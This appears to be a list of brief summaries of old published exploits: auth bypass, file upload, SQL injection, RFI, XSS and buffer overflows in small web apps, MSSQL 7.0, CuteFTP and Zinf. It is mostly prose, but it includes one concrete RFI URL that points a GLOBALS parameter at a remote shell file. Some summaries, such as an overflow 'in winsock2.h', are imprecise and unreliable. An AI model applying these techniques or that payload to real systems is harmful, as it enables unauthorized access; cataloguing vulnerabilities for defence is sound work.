LulieBlog version 1.2 is affected by multiple remote vulnerabilities, including admin authentication bypass, file upload, and blind SQL injection. The admin authentication bypass allows an attacker to modify articles, create new articles, and change the admin username, blog title, and admin email. The file upload vulnerability allows an attacker to upload files to the server. The blind SQL injection vulnerability can be exploited using a Perl script.
The Web Slider script version 0.6 and prior suffers from insecure cookie handling. When an admin logs in successfully, a cookie is created that contains no password or other authentication data. By creating a specific cookie, an attacker can impersonate an admin and gain unauthorized access to restricted areas.
By sending a large buffer with specified data, an attacker can stop the Microsoft MSSQL 7.0 server. The error observed differs according to the service pack, but the result is always the same. Exception code = c0000005. This code is for educational purposes and the author is not responsible for any acts performed using this exploit.
The vulnerability exists in the /include/fckeditor/editor/filemanager/upload/php/upload.php file of La-Nai CMS version 1.2.16. The code allows an attacker to upload arbitrary files to the server. The file name and extension are obtained from the uploaded file, and the file type is checked against allowed types. However, the check can be bypassed by modifying the 'Type' parameter. This allows an attacker to upload any file, regardless of its extension or type. The uploaded file is saved in the target directory, which can be specified in the configuration file. This can lead to remote code execution or unauthorized access to sensitive information.
The Proof of Concept (PoC) demonstrates two SQL injection vulnerabilities in the Serendipity Weblog application. The first PoC script retrieves the username and MD5 hashed password of the first author from the 'serendipity_authors' table. The second PoC is a URL that can be used in the browser to retrieve the username and password of the first author from the 'serendipity_authors' table.
An attacker can create a crafted CuteFTP macro (*.mcr) that, when loaded on the target computer, downloads an arbitrary file into the target user's startup folder.
This exploit takes advantage of a buffer overflow vulnerability in the winsock2.h library. By sending a specially crafted input, an attacker can overwrite the buffer and execute arbitrary code.
The vulnerability allows an attacker to include a remote file in the vulnerable file /bigace/system/admin/plugins/menu/menuTree/plugin.php. The exploit URL is http://localhost/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://localhost/shell.txt?
The ClanLite V2 script is vulnerable to SQL injection and XSS attacks. The SQL injection vulnerability can be exploited by an attacker to extract sensitive information from the database. The XSS vulnerability allows an attacker to inject and execute malicious scripts on the affected website.
This exploit targets a buffer overflow vulnerability in the Windows version of the Zinf audio player. The vulnerability is present in version 2.2.1 and allows for remote code execution via a malicious .pls playlist file. The exploit generates a file called exploit.pls, which overflows a structured exception handler (SEH) and jumps to a service-pack-independent address to download and execute a file.